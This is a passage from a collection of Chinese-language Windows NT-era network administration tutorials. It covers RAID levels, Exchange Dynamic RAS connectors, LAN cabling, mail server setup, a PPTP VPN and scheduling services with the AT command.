    RAID 3——本级提供基于位级的磁盘条带化，其中一个磁盘留作奇偶性数据专用，以动态地再现一个条带成员失效时丢失的数据。本级当前还没有在 Windows NT 上实现。

    RAID 4——RAID 4提供基于块级的磁盘条带化，其中一个磁盘留作奇偶性数据专用。本级当前还没有在 Windows NT 上实现。

    RAID 5——Stripe Set with Parity（带奇偶校验的带区集）提供基于块级的磁盘条带化。奇偶性数据均匀地分布于所有磁盘条带成员，而不局限于某个单一的磁盘--例如RAID 4配置的情形。数据分布于所有磁盘条带成员避免了单一奇偶磁盘上经常发生的I/O瓶颈。RAID
5 当前在 Windows NT Server上实现。

返回


基于 TCP/IP 的动态 RAS 连接器

《一键清理系统垃圾》

基于 TCP/IP 的动态 RAS 连接器

安装 RAS 后，必须将最新的 Windows NT 服务包安装到提供动态 RAS 连接器的 Microsoft Exchange Server 计算机上。如果运行的是 Windows NT 3.51，则必须安装 Service Pack 4 或更高版本；如果运行的是 Windows NT 4.0，则必须安装 Service Pack 3 或更高版本。如果服务器是一台支持 Compaq Software Support Disk (SSD) 的 Compaq 计算机，则应在安装 Windows NT Service Pack 后，再安装 SSD。安装 Compaq SSD 可满足许多服务请求。

配置服务器使之支持 DRAS 连接器，这包括五个基本内容：

配置客户端。
配置 RAS 服务器。
配置 TCP/IP 地址池。
配置名称解析。
添加和配置 DRAS 连接器
配置客户端
通常，配置客户端就像配置一个可拨到远程站点的电话簿项那样容易。

当 RAS 会话处于活动状态时，如果本地网络的通信中断，则有可能需要清除在远程网络上使用默认网关复选框。如果清除了该复选框，可能就会无法连接到远程 Exchange Server 计算机上的网络接口卡 (NIC)。通过 ping 远程服务器上的 NIC，可检查是否可以连接。如果 ping 失败，则必须配置 RAS 客户端，以便请求一个特定的 IP 地址；并配置 RAS Server Service 使之允许远程客户请求 IP 地址。

TCP/IP IP 地址的分配十分重要。本文示例用的是 192.168.100.n 网络，这里的“n”表示范围可能是 1 至 254 的主机。需要强调的是，在 Microsoft Windows NT RAS 服务器首次接受拨号客户的访问时，安装在该服务器上的每个调制解调器均会分得一个 IP 地址。在服务器下次重启前，调制解调器都会一直保留这个地址。Microsoft Windows NT 会从第一个 IP 地址开始，按升序分配 IP 地址池中的这些地址。切记，我们建议您以降序开始分配“客户端”IP 地址，即从 IP 地址池中的最后一个地址开始。因而，对于从 192.168.100.1 至 192.168.100.254 的地址池，第一个“客户端”分配到的 IP 地址是 192.168.5.254，第二个是 192.168.5.253，依次类推。这样即可消除因调制解调器添至“宿主”服务器而带来的任何潜在冲突。

客户端的配置方法是：在拨号电话簿项中选择“PPP TCP/IP 设置”对话框，然后选择“指定 IP 地址”。输入远程服务器上 IP 地址池中的最后一个 IP 地址。

单击“RAS 服务器 TCP/IP 配置”对话框，将 RAS 服务器服务配置为“允许远程客户端请求默认的 IP 地址”。

如果您的浏览器不支持内嵌框，单击此处浏览单独的页面。

用 route 命令，添加一个到远程服务器上 NIC 的路由。语法如下：

route add<REMOTE_NIC<REQUESTED_IP_ADDRESS -p
这种配置可确保到远程路由的路径能够保持一致。设置此配置并使用 route 命令的 -p 开关，可提供一个永久静态路由（服务器重启后仍有效）。此外，将客户端配置成仅接受 Microsoft 加密的身份验证，也是个很好的做法。

配置 RAS 服务器
即使连接预置为“远程启动”，RAS 服务器也必须配置成可拨出并接收呼叫。原因是 DRAS 连接器需要拨号电话簿项。要将 DRAS 连接器配置成可拨出并接收呼叫，请执行以下步骤：

在安装远程访问对话框中，单击配置。
在配置端口用法对话框，单击拨出和接收。
单击确定，完成配置。
下面即是这些对话框的示例。

如果您的浏览器不支持内嵌框，单击此处浏览单独的页面。

配置 TCP/IP 地址池
在安装远程访问对话框中，单击网络。如果需要，单击 TCP/IP，配置静态地址池。选择地址池取决于是否需要通过 Internet 及内部网访问远程拨号客户机，后者也可以拨入到该 RAS 服务器。如果可能，RAS 服务器的网络 ID 应与 NIC 的网络 ID 相同。要达到同一目的，也可使用 DHCP，并在 DHCP 服务器上保留此 RAS 段。如果 RAS 客户不需要访问 Internet，那么最好的做法是选择一个 InterNIC 保留的地址段。内部网预留的 IP 地址段如下所示：

A 类 - 10.0.0.0
B 类 - 172.16.0.0 to 172.31.255.254
C 类 - 192.168.0.0 to 192.168.255.254
虽然最终的选择权属于您，但 Microsoft 建议您用 C 类地址。一个 C 类地址池可提供最多 254 个地址，对于大多数 RAS 实现是足够了。

注意 每个调制解调器设备需要两个 IP 地址 - 一个用于服务器，一个用于客户端。

如果您的浏览器不支持内嵌框，单击此处浏览单独的页面。

配置名称解析
名称解析是连接器操作性的基础。RPC 需要 TCP/IP 名称解析，而 DRAS 连接器使用 RPC 在服务器之间进行通讯。在这种情况下，应该在名称解析中使用 Winnt\System32\Drivers\Etc 文件夹中的 HOSTS 文件。要正确使用 HOSTS 文件，应选中 TCP/IP 协议属性（位于“控制面板”上的“网络”工具中）上的启用 DNS 作为 Windows 名称解析。HOSTS 文件应包含通过本地服务器的动态 RAS 连接器连接的另一个 Exchange Server 计算机的服务器名称和 IP 地址。下面即是 HOSTS 文件中一个有效项的示例：

192.168.1.1 Server_name
注意 要使 HOSTS 功能正常，保存它时应不带文件扩展名。

Exchange Server Service 帐户拥有能够在 Exchange Server 计算机上执行很多特殊任务的相应权限。Exchange Server 消息传输代理 (MTA) 使用服务帐户的凭据，将邮件发送给信息存储 (IS)。因而，最好能将另一个 Exchange Server 站点的 Exchange Server Service 帐户作为 DRAS 连接器中的 RAS 改写帐户。真正的服务帐户在 Exchange Server Administrator 程序中 Organization 对象的 Permissions 选项卡上，有自定义的角色。必须通过 RAS Admin，给 Exchange Server Service 帐户授予拨入权限；而且，为了使服务帐户拥有新的权限，Exchange Server 服务必须停止并重启。

注意 服务器对象上具有 Service Account Administrator 角色的帐户，可用来代替服务帐户。在用服务帐户成功地进行配置后，最好用具有这种角色的帐户进行实施。

添加和配置 DRAS 连接器
配置 Exchange Server 计算机分为两步：

添加一个 RAS 传输堆栈。
添加并配置 DRAS 连接器。
要添加 RAS 传输堆栈，请执行下列步骤：

在 Exchange Server Administrator 程序中，单击该服务器对象。
在 File 菜单，单击 New Other，然后单击 MTA transport stack。
单击 RAS 传输堆栈和 Exchange Server 计算机，然后连续两次单击 OK。
这样您就定义了用于动态 RAS 的传输堆栈。不必为该堆栈添加任何信息。

如果您的浏览器不支持内嵌框，单击此处浏览单独的页面。

要添加 DRAS 连接器，请执行下列步骤：

在 Exchange Server Administrator 程序中，单击此连接对象。
在 File 菜单，单击 New Other，然后单击 Dynamic RAS Connector。
如下所示，完成 General、Schedule、RAS Override、MTA Override 及 Connected Sites 属性选项卡中的内容设置。
General 选项卡：

Display name - 该名称将显示在 Exchange Server Administrator 程序中。
Directory name - 该名称将显示在性能监视器上。
Remote server name - 这是目标服务器的 NetBIOS 名称。

如果您的浏览器不支持内嵌框，单击此处浏览单独的页面。

Schedule 选项卡：

根据自己的意愿设定计划。

如果您的浏览器不支持内嵌框，单击此处浏览单独的页面。

RAS Override 选项卡：

输入远程 Exchange Server Service 帐户的用户 ID。

如果您的浏览器不支持内嵌框，单击此处浏览单独的页面。

MTA Override 选项卡：

Lifetime (sec) - 将该值改为 15。
Disconnect (sec) - 将该值改为 15。
Max open retries - 将该值改为 5。
Max transfer retries - 将该值改为 5。
Open interval (sec) - 将该值改为 120（这样，如果邮件没有结果，就会每隔两分钟拨出一次）。
Transfer Interval (sec) - 将该值改为 60。

如果您的浏览器不支持内嵌框，单击此处浏览单独的页面。

Connected Sites 选项卡：

单击 New，键入目标站点的名称，然后单击 OK。单击 OK 后，Connected Sites 选项卡就会显示要连接到远程站点的 Organization、Site、Routing address 和 Cost。显示在 Routing address 下面的 X.400 地址应该与远程站点的 X.400 地址一致。验证该地址是否与远程站点的 X.400 站点地址一致。

可用给目标站点发送邮件的方式，来测试连接器。如果为远程站点的用户创建一个自定义的收件人，可使该任务更容易完成。要确保目标 X.400 地址正确，选择远程站点中的一个邮箱，并查看 E-mail Addresses 选项卡。在本地站点的 Exchange Server Administrator 程序中，单击 File 菜单中的 New Custom Recipient，然后单击 X.400 address。填写 Given name、Surname、Organization、PRMD、ADMD 及 Country/Region 字段。切记，默认情况下，此处的 Organization 与该 Exchange Server 站点一致；PRMD 与该 Exchange Server 组织是一致的。

以下讲述了配置三个站点且每个站点给其它两个站点配置一个动态 RAS 连接器的方法。虽然所有站点均可连至其它站点，但复制路径却不是闭环的。一般情况下，会有一个复制桥头，而且所有附属站点都复制到该桥头上。

配置每个服务器上的地址池。 Server1

192.168.1.1

192.168.1.2

Server2

192.168.2.1

192.168.2.2

Server3

192.168.3.1

192.168.3.2

配置每个服务器用于 NetBIOS 名称解析。 服务器
HOSTS 文件项目

erver1

Server2NIC

Server2

Server3NIC

Server3

Server2

Server1NIC

Server1

Server3NIC

Server3

Server3

Server1NIC

Server1

Server2NIC

Server2

返回


局域网安装软硬件要求及有关假设

《一键清理系统垃圾》

局域网安装软硬件要求及有关假设

总体目标：
    要求所组建的局域网能够做到：
    1.网络类型为：服务器/工作站型；
    2.各工作站之间可以互相访问，共享某些目录；
    3..服务器为WEB服务器，即可以在任何一个工作站中输入如：http://www.company.com.cn 即可以看到贵公司的局域网内部的网站（注意：此网站只有在局域网上有用，在国际网上是没有用的，因为在国际互联网上的域名服务器并没有注册这个网址。）
    4.服务器同时作为邮件服务器，使得公司内部员工可以拥有局域网内部邮箱地址，如：webmaster@company.com.cn 而且这个邮箱可以用Outlook 等邮件软件自由收发。（注意：此邮箱只有在局域网上有用，在国际网上是没有用的，因为在国际互联网上的邮箱服务器并没有注册这个邮箱。）
不用添加设备即可扩充的功能：
    1.可将服务器的WEB功能扩充为免费主页服务器，使得各部门或才各员工可以做主页，并且互不干扰。
    2.添加各种CGI程序，建立本公司的聊天室，论坛，投标系统，通告系统，以及员工数据库，财务数据库等。
    3.如分公司相隔较远，可用拨号上服务器的方法联网，如分公司超过一个，要求增加一台交换机。
硬件要求：
服务器：PⅡ200 32M内存以上(建议：PⅡ400、120M内存)
工作站：４８６（７５MHz ）16M内存以上(建议：P200、32M内存)
网卡：每部机上各一块 （如 D-Link ，NE 2000 ）
电缆：同轴电缆或双绞电缆 （如只有两部机时，可用交差双绞线直接连接）
Huber ：1 个或多个
水晶头(用于连接网线和网卡的接口)
软件 (中文版)：
(服务器操作系统必备软件)Win NT Server 4.0
(网页浏览用)IIS 4.0
(电子邮件用)Exchange Server 5.5 （如不设邮件系统可不用。）
(工作站操作系统)Win 95或Win 98
工具:
驳线钳(用于接驳水晶头)（必备）
水晶头接法:
    关于双绞线的色标和排列方法是有统一的国际标准严格规定的，现在常用的是TIA/EIA568B。在打线时应使用如下的顺序：(TIA/EIA568B)
1->橙白
2->橙
3->绿白
4->蓝
5->蓝白
6->绿
7->棕白
8->棕
    而且，使用电缆两头一对一的连接方式， 会使一组信号（负电压信号）通过不绞合在一起的两根芯线传输，造成极大的近端串扰（NEXT-> Near-end-crosstalk）所以应按照国际标准打线！！

可选工具：
    网络电缆测量器：一个很好用的东东。网线接好后，可以测出哪一根线通不通，以及哪根线与哪根线对换等。没有的话，如果接错了，要检查麻烦可就大了。
假设：
Win 95、Win 98、Win NT 等工作站操作系统已经安装好。又假设：公司名称为：company，准备使用的http为：http://www.company.com.cn 准备使用的IP为：192.168.0.0~255 其中：网关 192.168.0.0服务器 192.168.0.1（192.168.0.2~9保留）、财务部192.168.0.10~30、供销部192.168.0.31~50
······自动分配为：192.168.0.100~255；准备使用的域名为：company.com.cn；全网仅有一个组：Users 。
安装非对等网，即服务器/工作站网。电缆用双绞电缆。

返回


利用Exchange建立Internet电子信箱

《一键清理系统垃圾》

利用Exchange建立Internet电子信箱

   一、NT Server的准备工作

     1、为Exchange Server准备一个NTFS分区，NT Server应该为主域控制器状态。

     2、NT Server必须已经安装Windows NT 4.0 Server Pack3 (SP3)或更高的升级服务包。

     二、安装Exchange Server5.5

    根据安装向导的提示创建组织和新节点，指定节点服务账号，最后运行优化程序（优化程序会把数据库文件移动到服务器的其他硬盘和分区上，从而提高Exchange Server的性能）。安装完毕后，要验证Exchange 是否成功启动了必要的服务，在“Start”－“Settings”－“Control Panel”－“Service”中，查看是否启动了以下服务：

    Microsoft Exchange Directory

    Microsoft Exchange Information Store

    Microsoft Exchange Message Transfer Agent

    Microsoft Exchange System Attendant

    MS Mail Connector Interchange

    Remote Procedure Call (RPC) Locator

    Remote Procedure Call (RPC) Service

     三、设置Exchange Server5.5

    依次从“开始”－>“程序”－>“Microsoft Exchange ”－>“Microsoft Exchange Administrator”，对Exchange Server进行设置。

    1．安装和启动Internet Mail Service:

    Internet Mail Service是一个Windows NT服务，安装在Exchange Server服务器上，能够从支持SMTP的计算机上接收和发送电子邮件。进入“Microsoft Exchange Administrator”后，在“File”菜单中，指向“New Other”，然后单击“Internet Mail Service” ，运行安装向导，除选择“使用DNS收发邮件”和“创建节点邮件地址(如lanhome.test.cn)”外，其余对话框全部取默认值。

    2．验证POP3协议：

    进入“Microsoft Exchange Administrator”后，在Configuration容器下，单击Protocols，在右边窗口中，双击POP3对象，验证POP3协议是否已启用。

    3．为NT域内用户设置邮箱：

    进入“Microsoft Exchange Administrator”后，在“File”菜单中，指向“New Mailbox”，出现邮箱属性窗口，单击“Primary Windows NT Account”,选择“Select an existing Windows NT account”，为NT域内用户逐一添加邮箱。

    邮件服务器安装设置至此全部完成。

     四、在Web服务器上为Exchange 创建DNS记录

    邮件服务器必须安装TCP/IP协议，分配IP地址，并为网络的“域名服务”(DNS)提供信息。在DNS中需添加以下两条记录：

    1.A记录：又称地址记录。例如本例中邮件服务器主机名为MAIL，Internet域名是lanhome.test.cn，IP地址是212.50.0.99，则A记录应为：lanhome.test.cn A 212.50.0.99。

    2. MX记录：告诉哪台计算机负责为系统处理SMTP邮件。例如本例中把所有关联域地址lanhome.test.cn的邮件发送到主机MAIL上，则MX记录为：lanhome.test.cn MX 10 lanhome.test.cn。

     五、客户端收发邮件功能的实现

    NT域内用户可利用电子邮件客户端程序（如Outlook Express），完成电子邮件收发功能。首先添加自己的邮件账号，把SMTP和POP3服务器设置为已安装后的邮件服务器，例如本例中的lanhome.test.cn，登录账号和口令则与NT域内的一致。设置完成后，就可收发电子邮件了。

     这样，每个NT域内用户都可以拥有自己的Internet电子邮件信箱。

返回


利用Microsoft Mail邮建立简易电子邮件系统

《一键清理系统垃圾》

利用Microsoft Mail邮建立简易电子邮件系统

   一、准备工作
     1、检查服务器是否安装了Windows NT Message。即是打开“控制面板”查看是否有“电子邮局”和“收件箱”两个图标：。如果没有则单击“添加/删除程序”/“Windows NT安装程序”，选取“Windows Message”，需要4.6MB的磁盘空间，也可以单击“详细资料”而在“Windows Message”对话框里只选取第二项“Microsoft Mail”，这只需要0.6MB磁盘空间。然后单击“确定”直到安装完成。

图一 图二 图三

     2、在服务器或网络上任一台机器上建立一个子目录以作为存放邮件的邮局目录，本例是在服务器的D：盘建立了一个lanmail。注意：该目录一定要设为共享，并允许使用此邮局的用户拥用读写权限。

    二、安装邮件服务器

     1、建立管理员帐号

     在Windows NT Server 4.0上，选取“开始”→“设置”→“控制面板”→“Microsoft Mail邮局”→“创建新的工作组邮局”。

     (1)选择“下一步”后，首先要求确定邮局地点，输入刚才准备时建立的邮局目录：lanmail。若输入尚未不存在，系统会警告：无法在这里创建有效的邮局目录，因为您只能在现有的目录中创建邮局。

     (2)接下来系统将自动在该目录中创建一个新邮局：wgpo0000，一个工作组只允许有一个邮局，但若有多个工作组，则其自动在最后一位加1，如wgpo0001。

     (3)选择“下一步”后，系统会提醒您将该目录设置为完全共享，以使工作组里的所有人都可以使用它。

     (4)“确定”后，系统进入“邮局管理程序”，要求输入管理员帐号的详细资料（如图3）,注意它的初始口令是全部大写的PASSWORD。

     (5)“确定”后，在“邮局管理程序”里的c:\lanmail\wgpo0000邮局就有了第一个用户webmaster。

     (6)这时可直接“添加新用户”，也可选择“关闭”通过下一步里的方法来添加新用户。

     2、添加用户

    选取“开始”→“设置”→“控制面板”→“Microsoft Mail邮局”→“管理现有的工作组邮局”，选取邮局所在的路径，首先输入管理员信箱和密码，进入邮局管理程序后，选取添加使用者，根据提示添加用户(如图4)。

     二、设置管理员收件箱

     选取“开始”→“设置”→“控制面板”→“电子邮件”，系统出现“电子邮件”对话框，在“本机安装的配置文件”列表框里尚未有一个配置文件，单击“添加”，进入“Windows Messaging”安装向导，选择配置Microsoft Mesagging的方式为使用“Microsoft Mail”信息服务，单击“下一步”，这时系统要求提供邮局路径，输入“D:\lanmail\wgpo000”单击“下一步”；在“用户名称列表”中选取“webmaster”，单击“下一步”；输入在设置邮局时输入的密码，这里是默认的大写“PASSWORD”，单击“下一步”；接下来的两步是确定“个人通讯录”和“个人文件夹”文件的路径，采用默认值直接“下一步”即可，最后，系统出现“安装成功了”的对话框，单击“完成”。返回到前面的“电子邮件”对话框，可以看见“常规”属性里的“本机安装的配置文件”列表里有了一个“Web_Server”配置文件了。

     单击桌面的“收件箱”图标或单击“开始”/“程序”/“Microsoft mail”进入Microsoft Exchange 5.0。我们首先会看见已经有一封“欢迎”信在“收件箱”里了，而且状态有“1封邮件，1封未读”的信息。

     三、Windows 95工作站的安装

     安装Windows 95工作站时，选取自定义安装，以安装组件“Microsoft Exchange”。在工作站上双击“收件箱” 图标，出现收件箱安装向导，余下的步骤与上面的安装webmaster邮箱方法一样。

     如果希望邮件到来时能自动通知，将收件箱添加到启动菜单上，只要屏幕的右下角一显示新邮件标志，双击“收件箱”的图标 就可以收发电子邮件了。

     四、Windows 98工作站的安装

     Windows 98已经取消了Microsoft Exchange，怎样让Windows NT网络中的Windows 98工作站也能使用内部MS 电子邮局呢？经过我们实验，这里有两种方法可行。一是安装Windows 98的安装光盘OLDWIN95目录中的收件箱——根据实测，安装之后其也可用于在对等网中建立一个内部电子邮局。

     另一个方法是采用OUTLOOK（注意：不是OUTLOOK EXPRESS）来安装Windows 98工作站的电子邮件系统。步骤如下：

     1、安装Office 97中的Outlook 97；
     2、选取“开始”→“设置”→“控制面板”→“电子邮件”，系统出现的是“Microsoft Outlook属性”而不是“电子邮件”对话框。这是因为系统已经有了一个默认的配置文件“Microsoft Outlook”，在“此配置文件安装的信息服务”列表中已经存在“Internal Mail”、“Outlook通讯录”、“个人文件夹”三项，单击“添加”；出现“添加配置文件服务项目”对话框，在列表里选取“Microsoft Mail”，单击“确定”；这时出现一个“Microsoft Mail”对话框，但风格完全跟前面不同。在“连接”页框要求输入或浏览“邮局路径”；接下来单击“登录”页框，输入“邮箱名称”和“口令”，并选取“登录时自动输入口令”，单击“确定”；返回到“Microsoft Outlook属性”对话框，在列表中已经多了一项“Microsoft Mail”了。
     3、现在介绍一种跟在NT Server和WIN95的配置步骤一样而勿需通过“控制面板”来进行的方法：直接进入Outlook，在“工具”菜单中选择“选项”，在“选项”的“常规”页框中，选取“启动设置”中的“提示要使用的配置文件”单选钮；单击“确定”并退出Outlook。重新启动Outlook，在启动画面出现一个“选取配置文件”对话框，这时只有一个默认的“Microsoft Outlook”，单击“新建”，后来的步骤就跟前面讲的一样了，这样的好处是邮箱名称直接由系统从“邮局通讯录”里列出而不必象Outlook中配置时由用户自己输入。

     五、测试

     接下来，我们开始测试这个新建的内部电子邮件系统。
     1、首先在服务器的收件箱中发出一封信给WIN98工作站：在“收件人...”一栏即可直接填入也可单击该按钮在“邮局通讯录”里选取；在“主题”一栏填入“测试信 to Heatch”；在“正文框”中输入“这是一封测试信，是针对Heatch发出的，若有收到请即回复。”，然后点击“发送”图标（如图所示）。

     2、如果一切正常，那么在WIN98工作站的Outlook会有一个提示报告：新邮件已到达，立即阅读吗？单击“是”，我们就会看到一封“测试信 to Heatch”邮件：发件人是webmaster，收件人是Heatch，主题和正文与服务器上发出的一致（如图所示）。

     3、接下来我们对此进行回复：点击“答复发件人”图标，系统即进入“Re：测试信 to Heatch 邮件”窗口，“收件人”和“主题”两栏既可采用系统默认值也可重新输入，在“正文框”输入“报告Sir，俺已收到，请别挂念！”，然后点击“发送”图标（如图所示）。
     4、如果一切正常，那么在服务器的右下角会出现一个“邮件”标志——表明有新邮件到达。打开“收件箱”，可以看到一封发件人是Heatch的“Re：测试信 to Heatch”邮件。双击该信即可在“Re：测试信 to Heatch Microsoft Messaging”窗口阅读该信（如图所示）。

返回


利用NT 4．0实现VPN

《一键清理系统垃圾》

利用NT 4．0实现VPN

虚拟专用网络（VPN）是一门网络新技术，它无须专用的长途线路，通过因特网或其它公网，即可在异地的两台计算机或局域网之间建立一个安全的隧道连接，达到通过Internet或其它公网安全访问企业网的目的。移动用户也可拨入因特网，再通过VPN安全地访问自己企业的内部网络。VPN可通过带VPN功能的路由器、软件VPN系统和专用硬件VPN设备来实现。下面介绍NT4．0下的软件VPN的实现。

微软公司引入了点对点通道协议（Point－to－Point Tunneling Protocol PPTP）支持VPN。PPTP在NT环境下利用RAS和PPP来实现VPN。PPTP允许远程用户拨号到本地的ISP，然后通过一个安全的隧道来访问远程的企业内部网络。PPTP为NT的远程访问服务（RAS）连接进行协议封装和数据加密，以此提高安全性。另外PPTP允许VPN服务器对于接入的客户进行身份验证。PPTP可以支持多种协议，如IP、IPX、NetBEUI。微软公司的网络操作系统Windows NT Server 4．0支持基于PPTP的VPN，其主流桌面操作系统Windows 98和Windows NT Workstation 4．0内置了PPTP客户端软件，Windows 95通过升级也可支持此客户端软件。

NT下的VPN由PPTP客户机和PPTP服务器构成。在企业网络中，PPTP服务器是一台运行Windows NT Server的网络服务器，作为企业VPN的网关，接收来自因特网的PPTP封装报文，解析出相应内部网络上的机器名和地址，并转发给指定的内部网客户。一个异地的PPTP客户机首先通过PPP协议拨叫当地的ISP，建立与因特网的连接，然后再通过PPTP方式拨叫远程已接入因特网的企业网络的PPTP服务器，通过安全性验证后即建立起VPN隧道连接，可像局域网用户一样访问企业的网络资源。通过VPN，远程客户机拨入当地的ISP，而不需直接拨叫远程访问服务器，即可访问企业网络，这将大大减少远程或移动客户用于连接企业网络的费用。

NT下的VPN配置需在企业网络的PPTP服务器和远程的PPTP客户机两方进行配置。

安装和配置NT Server 4．0下的PPTP服务器

用于PPTP的服务器需安装NT Server 4．0、正确配置TCP／IP网络协议、并有Internet上的一个合法IP地址、且正确连入Internet。

1．安装点对点通道协议（PPTP）

按如下步骤在一台运行Windows NT Server 4．0的服务器上安装PPTP协议：

1）“开始”→“设置”→“控制面板”，双击“网络”，出现“网络属性”对话框，单击“协议”，再单击“添加”出现“选定网络协议”对话框，选择“点对点通道通信协议”，单击“确定”出现“PPTP设置”对话框；

2）选择需要服务器同时支持的VPN数目，单击“确定”，出现“安装远程访问”对话框；

3）单击“添加”，出现“添加RAS设备”对话框，选择可用的RAS设备，单击“确定”，返回“安装远程访问”对话框；

4）选择一个VPN设备，单击“配置”，出现“配置端口用法”对话框，确保“只能接收”被选中，单击“确定”，返回“安装远程访问”对话框；

5）选择一个VPN设备，单击“网络”，出现“网络配置”对话框，在“允许远程客户运行”选项中只保留“TCP／IP”被选中；单击“TCP／IP”选择框旁边的“配置”，出现“RAS服务器TCP／IP配置”对话框，在此可进行一些TCP／IP方面的配置，如可允许TCP／IP客户访问“整个网络”或“仅限于本地计算机”，对于客户地址分配，可用DHCP或静态地址集等；进行必要的设置后单击“确定”，返回“网络配置”对话框；“加密设置”选项中确保选中“Microsoft加密”，并选中“请求数据加密”，这使所有连接到PPTP服务器的远程客户机将进行基于NT的身份验证；单击“确定”，返回“安装远程访问”对话框；

6）单击“继续”，完成最后安装，然后重启NT。

2．配置VPN用户

本过程添加要通过VPN访问企业网络的用户，并给予用户拨入的权限。

1）单击“开始”→“程序”→“管理工具”→“域用户管理器”，出现“域用户管理器”窗口；

2）单击选单项“用户”→“新用户”，出现“新用户”对话框，设置用户名、密码及所属的组，然后单击“拨入”出现“拨入信息”对话框，选中“给予用户拨入的权限”，单击“确定”，返回“新用户”对话框，最后单击“添加”，从而添加一个新用户。重复上述步骤添加所有将要通过VPN访问企业网络的用户。

至此，PPTP服务器方的配置完成。

安装和配置Windows 98下的PPTP客户机

Windows 98下的PPTP客户机需正确安装TCP／IP协议和拨号网络，并能通过拨号连入Internet。

1．安装MS虚拟专用网络适配器

单击“开始”→“设置”→“控制面板”，双击“网络”，出现“网络”对话框，单击“添加”出现“选择网络组件类型”对话框，选中“适配器”然后单击“添加”，出现“选择网络适配器”对话框，选中“Microsoft虚拟专用网络适配器”后单击“确定”，返回“网络”对话框，单击“确定”以完成最后安装，然后重启计算机。

2．创建到ISP和VPN的拨号连接

要配置Windows 98下的PPTP客户机，必须建立两个拨号网络连接。一个连接用于连接ISP，另一个连接用于连接远程企业网的PPTP服务器。

1）建立到ISP的拨号网络连接。由于比较简单，这里不再介绍。

2）建立到企业网的拨号网络连接

双击“我的电脑”，双击“拨号网络”，然后单击“创建新的连接”。在“选择设备”中，单击“Microsoft VPN Adapter＂，然后单击“下一步”。在“主机名或IP地址”中，键入待连接网络的PPTP服务器的名称或IP地址。单击“下一步”，然后单击“完成”。

通过拨号连接远程的企业网络

双击“我的电脑”，然后双击“拨号网络”。双击到ISP的连接，键入ISP分配的用户名和密码，然后单击“连接”。成功登录到Internet账号后，单击指向企业网络的连接，键入在域名管理器中设置的用户名和密码，然后单击“连接”，即可连入远程的企业网。

为了安全，应使PPTP服务器位于企业网络的防火墙之后，使发往PPTP服务器数据能通过防火墙加以过滤，避免服务器受到黑客的直接攻击。另外应启用服务器上的TCP端口过滤和PPTP过滤功能以增强安全性。

返回


连接网络(硬件)

《一键清理系统垃圾》

连接网络(硬件)

硬件很简单，每部机都接一块网卡，用网线将网卡与集线器（hub）连起来。
网卡：建议用D-Link的网卡，很多网友都说性价比很不错，我单位用的就是这种网卡。（安装网卡不用我说了吧？好吧，简单说一说。）拆开机箱，找一条适合的插槽(PCI或ISA)插进去,上好螺丝,盖上机箱,重新开机。计算机一般会发现新硬件，然后按照它的向导，一直按“下一步”，选择“从软盘安装”，插入软盘，装好驱动。（注:NE2000兼容卡也不错）
水晶头的连接：网线最好用进口的（崇洋媚外）五类双绞线（适用于十兆或百兆网），因为没有办法，进口的线质量好，韧性好，接起来方便。我也用过国产的，容易断，它总是心太软，而且接起来的失败率高达10%，害得我的领导说：“不要急，慢慢来，搞不好你可以不搞的，我另外请人搞。”言归正传，先用刀将电缆（上面说了假设用双绞电缆的）外层的皮剥掉大约2厘米，把里面的8个蕊线搞直，然后依：白橙,橙,白绿,蓝,白蓝,绿,白棕,棕的顺序排好(从水晶头的8个金属片在正上方的方向看，记住，顺序也不能随意换，不然会在10M网络上可以通过，但在100M网络上却通不过。)排好后，试试插入水晶头里面，再拔出来,将多余的网线剪掉（以网线的外皮能被反卡住为准，一般约占水晶头长度的1/3)再插入水晶头里面，用驳线钳压紧。另一端方法一样。（如果是只有两部机的对等网，则另一端颜色对应为(从水晶头的8个金属片在正上方的方向看):白绿,绿,白橙,蓝,白蓝,橙,白棕,棕(36145278)
    做好后，就用“网络电缆测量器”测量一下。（接集线器的网线如果指示灯顺序为12345678。那么，恭喜你，驳接成功。如果是两台电脑对接则顺序为13245678）否则，先再用驳线钳压压两端，还不行的话，就先剪掉一个口（这个水晶头不能再用了，损失1.5元），重新接，试试看。再不行，就剪另外一个口，重新接。好象没有办法判断是那一个口接错，如果有，请告诉我好吗？（我的信箱在主页显示）。错误的原因可能是线压得不够紧造成的，怪不了人，有时候你做得很小心了，总是不行，但你按同样方法重做一次，就好了。
    都接好后，就可将网络连起来了。这里的例子是最简单的一种，就是：服务器用一条电缆与HUB相连，HUB与其它工作站相连。可以了，硬件连接就这么简单。

返回


让Windows NT的服务程序按时作息

《一键清理系统垃圾》

让Windows NT的服务程序按时作息

     Windows NT Server的服务程序管理器（Control PannelServices）仅能设置某项服务启动方式（自动、手动、失效），而在日常管理工作中，常要求的某项服务能定时开启、关闭。Windows NT Server提供的AT命令能快速、有效地完成各种应用程序的定时执行功能，是解决这一问题的有效手段。利用它可实现RAS服务定时开关，其具体步骤如下：
    1.在“设置”“控制面板”“服务”中启动Schedule服务，并将其启动方式属性设置为自动启动。
    2.在命令窗口中使用AT命令设置服务程序的定时启动关闭。
    AT命令的格式如下：
    AT [\\computername] time [/interactive] [/every:date[,]|next:date[,]] ″command″
    参数含义：
    无参数：显示所有已设置的计划命令情况。
    \\computername：指示执行该命令的计算机名，如省略则在本机执行。
    time：命令执行时间
    /interactive：当程序执行时是否与正在登录的用户进行交互。
    /every:date[,]：指定程序执行的日期（如每周二、三：/every:T,W）,每月1，2号：/every:1,2)。
    next:date[,]：指定程序下一次执行的日期。
    ″command″：定时执行的Windows NT命令，程序，批处理。
    AT [\\computername] [[id][/delete][/yes]]
    参数含义：
    id：分配给计划命令的识别号码，可由不带参数的AT命令查到。
    /delete：取消指定的计划命令，如果id省略的话，取消所有的计划命令。
    /yes：强制对所有的取消询问回答yes。
    如每日19：00启动，次日7：30关闭RAS服务的命令如下：
    AT 19:00 /every:M,T,W,Th,F,S,Su net start ″remote access server″
    AT 7:30 /every:M,T,W,Th,F,S,Su net stop ″remote access server″
    利用这种定时机制可以自动完成很多无须人工干预的过程，如本例的服务程序开启与关闭，以及文件、数据备份程序，系统自动清理、杀毒等等，是系统管理人员的好帮手。

返回


如何使用RAS远程回拨

《一键清理系统垃圾》

如何使用RAS远程回拨

1）在配置RAS服务器时，在配置里有3个选项，按需要进行选择。
如果要实现回拨，必须选择拨出和接收。

2）在RAS服务器的域里，填加此拨号用户。

3）在配置回拨时，有两种方式。
一种是在SERVER上填写固定的回拨电话号码。
当用户有固定的拨号电话时，可以采用此方式，当用户拨入时，RAS服务器经过验证用户成功时，SERVER自动断开拨号，SERVER将回拨到固定用户的电话，进行网络连接。
另一种是用户的电话号码不是固定不变的（因为出差在外）。
